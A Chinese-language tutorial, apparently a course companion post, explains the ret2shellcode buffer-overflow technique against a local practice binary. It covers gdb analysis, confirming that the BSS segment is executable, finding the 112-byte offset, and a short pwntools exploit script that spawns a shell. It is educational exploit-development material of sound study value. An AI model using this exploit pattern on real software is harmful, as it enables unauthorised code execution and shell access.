緩沖區(qū)溢出-基本ROP-ret2shellcode

本文視頻：
???????? 如果文字過于枯燥，可觀看在線視頻：https://edu.51cto.com/sd/16514

基礎(chǔ)知識：

??????? ret2shellcode，即控制程序執(zhí)行 shellcode 代碼。shellcode 指的是用于完成某個功能的匯編代碼，常見的功能主要是獲取目標(biāo)系統(tǒng)的 shell。一般來說，shellcode 需要我們自己填充。這其實是另外一種典型的利用方法，即此時我們需要自己去填充一些可執(zhí)行的代碼。

在棧溢出的基礎(chǔ)上，要想執(zhí)行 shellcode，需要對應(yīng)的 binary 在運行時，shellcode 所在的區(qū)域具有可執(zhí)行權(quán)限。

第一步：分析程序代碼

使用gdb ./ret2shellcode加載程序，在命令行中輸入checksec來查看啟用的保護

可以發(fā)現(xiàn)沒有啟用任何保護

我們使用disass main來看下main函數(shù)的匯編代碼

這里對strncpy函數(shù)做分析，strncpy的api為：char *strncpy(char *dest,char *src,int size_t);第一個參數(shù)是接收的變量，第二個是從那里復(fù)制，第三個是復(fù)制多少。經(jīng)過分析第一個參數(shù)就是[esp]，第二個參數(shù)是[esp+0x4]，第三個參數(shù)是[esp+0x8]，這樣我們知道最終要復(fù)制的內(nèi)容要放到[esp]中，而現(xiàn)在[esp]是0x804a080。

經(jīng)過分析發(fā)現(xiàn)調(diào)用了gets函數(shù)和strncpy函數(shù)，其中g(shù)ets函數(shù)存在溢出漏洞，但是該程序沒有使用system("/bin/sh")，我們可以嘗試讓程序跳轉(zhuǎn)到我們的shellcode中，也就是說gets函數(shù)接收的不再是普通的字符串而是我們構(gòu)建好的shellcode。

我們看下0x804a080地址在哪里：

第一種方法：使用IDA

第二種方法：在gdb里運行readelf，或者在linux的shell里運行readelf -S xxx查看bss段位置

是一個BSS段，如果可以我們講shellcode放到bss段中，然后將函數(shù)的返回值改為0x804a080，現(xiàn)在還缺少一個條件，就是bss段0x804a080是否有執(zhí)行權(quán)限，我們斷點調(diào)試下：

執(zhí)行b main 進(jìn)行斷點

執(zhí)行r 運行程序

執(zhí)行vmmap查看是否有執(zhí)行權(quán)限

0x804a080的區(qū)間是在標(biāo)紅的0x0804a000到0x0804b000，有x執(zhí)行權(quán)限

第二步：查找程序溢出的偏移量

重新執(zhí)行g(shù)db ./ret2shellcode命令加載程序

執(zhí)行pattern create 200創(chuàng)建字符串

執(zhí)行 r運行

輸入剛才創(chuàng)建的字符串

得到0x41384141地址，我們使用pattern offset 0x41384141來查看偏移

然后可以想到溢出代碼：

from pwn import *

p = process('./ret2shellcode')

shellcode = asm(shellcraft.sh())

buf2_addr = 0x804a080

p.sendline(shellcode.ljust(112,'a') + p32(buf2_addr))

p.interactive()

#####

shellcode.ljust(112,'a')這段代碼就是要講shellcode不足112長度的地方用a來填充。